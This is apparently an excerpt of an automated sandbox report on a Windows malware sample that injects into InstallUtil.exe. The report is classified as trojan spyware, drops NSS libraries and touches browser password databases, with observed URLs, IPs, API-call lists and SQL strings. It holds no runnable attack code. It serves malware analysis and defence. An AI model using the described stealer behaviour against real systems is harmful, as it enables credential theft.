                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=10oP_O2R
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=cdfm
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=qu55UpguGheU&l=e
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
                        Source: 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
                        Source: InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
                        Source: InstallUtil.exe, 00000004.00000002.2454873624.000000000137E000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, HIIIEC.4.drString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                        Source: InstallUtil.exe, 00000004.00000002.2454873624.000000000137E000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, HIIIEC.4.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                        Source: KFHJJD.4.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                        Source: KFHJJD.4.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                        Source: KFHJJD.4.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                        Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49741 version: TLS 1.2
                        Source: unknown HTTPS traffic detected: 49.12.106.214:443 -> 192.168.2.4:49742 version: TLS 1.2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_00411F55 CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,4_2_00411F55
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0040145B GetCurrentProcess,NtQueryInformationProcess,4_2_0040145B
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_6C65ED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset,4_2_6C65ED10
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_6C69B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,4_2_6C69B700
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_6C69B8C0 rand_s,NtQueryVirtualMemory,4_2_6C69B8C0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_6C69B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,4_2_6C69B910
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_6C63F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,4_2_6C63F280
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C6E6F104_2_6C6E6F10
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C7BEFF04_2_6C7BEFF0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C6E0FE04_2_6C6E0FE0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C820F204_2_6C820F20
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C6EEFB04_2_6C6EEFB0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C7B48404_2_6C7B4840
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C7308204_2_6C730820
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C76A8204_2_6C76A820
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C7E68E04_2_6C7E68E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C7189604_2_6C718960
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C7369004_2_6C736900
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C7149F04_2_6C7149F0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C7FC9E04_2_6C7FC9E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C7A09B04_2_6C7A09B0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C7709A04_2_6C7709A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C79A9A04_2_6C79A9A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C75CA704_2_6C75CA70
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C798A304_2_6C798A30
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C78EA004_2_6C78EA00
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C75EA804_2_6C75EA80
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C7E6BE04_2_6C7E6BE0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C780BA04_2_6C780BA0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C80A4804_2_6C80A480
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C6F84604_2_6C6F8460
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C76A4304_2_6C76A430
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C7444204_2_6C744420
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C7264D04_2_6C7264D0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C77A4D04_2_6C77A4D0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C7805704_2_6C780570
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C7425604_2_6C742560
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C7385404_2_6C738540
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C7E45404_2_6C7E4540
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C76E5F04_2_6C76E5F0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C7AA5E04_2_6C7AA5E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C8285504_2_6C828550
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C6D45B04_2_6C6D45B0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C73C6504_2_6C73C650
                        Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                        Source: Joe Sandbox View Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: String function: 6C66CBE8 appears 134 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: String function: 004047E8 appears 38 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: String function: 6C703620 appears 35 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: String function: 6C6794D0 appears 90 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: String function: 6C709B10 appears 31 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: String function: 00410609 appears 71 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: String function: 004104E7 appears 36 times
                        Source: 7AeSqNv1rC.exe, 00000000.00000002.1905965220.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs 7AeSqNv1rC.exe
                        Source: 7AeSqNv1rC.exe, 00000000.00000002.1907294244.0000000012CE1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameObjectWMICollection.dllH vs 7AeSqNv1rC.exe
                        Source: 7AeSqNv1rC.exe, 00000000.00000000.1657488047.0000000000A62000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameObjectWMICollection.dllH vs 7AeSqNv1rC.exe
                        Source: 7AeSqNv1rC.exe, 00000000.00000000.1657488047.0000000000A62000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameControlledAccessPoint.exeP vs 7AeSqNv1rC.exe
                        Source: 7AeSqNv1rC.exe Binary or memory string: OriginalFilenameObjectWMICollection.dllH vs 7AeSqNv1rC.exe
                        Source: 7AeSqNv1rC.exe Binary or memory string: OriginalFilenameControlledAccessPoint.exeP vs 7AeSqNv1rC.exe
                        Source: 7AeSqNv1rC.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: 0.2.7AeSqNv1rC.exe.1d010000.4.raw.unpack, WMIHelperClass.cs Cryptographic APIs: 'CreateDecryptor'
                        Source: 0.0.7AeSqNv1rC.exe.a7b8e7.1.raw.unpack, WMIHelperClass.cs Cryptographic APIs: 'CreateDecryptor'
                        Source: 0.2.7AeSqNv1rC.exe.12ce1a78.3.raw.unpack, WMIHelperClass.cs Cryptographic APIs: 'CreateDecryptor'
                        Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@21/22@2/4
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_6C697030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_004114A5 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_00411807 __EH_prolog3_catch_GS,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,HeapAlloc,wsprintfA,VariantClear,
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\7AeSqNv1rC.exe.log
                        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8176:120:WilError_03
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exe Mutant created: NULL
                        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2872:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8148:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1004:120:WilError_03
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File created: C:\Users\user\AppData\Local\Temp\delays.tmp
                        Source: 7AeSqNv1rC.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1002\desktop.ini
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                        Source: InstallUtil.exe, 00000004.00000002.2477121159.0000000034A58000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                        Source: InstallUtil.exe, 00000004.00000002.2460567735.000000001C7F6000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp, InstallUtil.exe, 00000004.00000002.2468701715.0000000022768000.00000002.00001000.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2482167987.0000000040931000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.4.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                        Source: InstallUtil.exe, 00000004.00000002.2477121159.0000000034A58000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                        Source: InstallUtil.exe, 00000004.00000002.2460567735.000000001C7F6000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp, InstallUtil.exe, 00000004.00000002.2468701715.0000000022768000.00000002.00001000.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2482167987.0000000040931000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.4.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                        Source: InstallUtil.exe, 00000004.00000002.2460567735.000000001C7F6000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp, InstallUtil.exe, 00000004.00000002.2468701715.0000000022768000.00000002.00001000.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2482167987.0000000040931000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.4.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                        Source: InstallUtil.exe, 00000004.00000002.2460567735.000000001C7F6000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp, InstallUtil.exe, 00000004.00000002.2468701715.0000000022768000.00000002.00001000.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2482167987.0000000040931000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.4.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                        Source: InstallUtil.exe, 00000004.00000002.2477121159.0000000034A58000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                        Source: InstallUtil.exe, 00000004.00000002.2460567735.000000001C7F6000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2468701715.0000000022768000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                        Source: InstallUtil.exe, 00000004.00000002.2477121159.0000000034A58000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                        Source: InstallUtil.exe, 00000004.00000002.2477121159.0000000034A58000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                        Source: InstallUtil.exe, 00000004.00000002.2477121159.0000000034A58000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                        Source: InstallUtil.exe, 00000004.00000002.2460567735.000000001C7F6000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2468701715.0000000022768000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                        Source: InstallUtil.exe, 00000004.00000002.2477121159.0000000034A58000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                        Source: InstallUtil.exe, InstallUtil.exe, 00000004.00000002.2460567735.000000001C7F6000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp, InstallUtil.exe, 00000004.00000002.2468701715.0000000022768000.00000002.00001000.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2482167987.0000000040931000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.4.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                        Source: InstallUtil.exe, 00000004.00000002.2460567735.000000001C7F6000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp, InstallUtil.exe, 00000004.00000002.2468701715.0000000022768000.00000002.00001000.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2482167987.0000000040931000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.4.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                        Source: InstallUtil.exe, 00000004.00000002.2477121159.0000000034A58000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                        Source: InstallUtil.exe, 00000004.00000002.2460567735.000000001C7F6000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2468701715.0000000022768000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                        Source: DBKEHD.4.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                        Source: InstallUtil.exe, 00000004.00000002.2460567735.000000001C7F6000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2468701715.0000000022768000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                        Source: InstallUtil.exe, 00000004.00000002.2477121159.0000000034A58000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                        Source: InstallUtil.exe, 00000004.00000002.2460567735.000000001C7F6000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2468701715.0000000022768000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                        Source: InstallUtil.exe, 00000004.00000002.2477121159.0000000034A58000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                        Source: 7AeSqNv1rC.exe ReversingLabs: Detection: 65%
                        Source: 7AeSqNv1rC.exe Virustotal: Detection: 30%
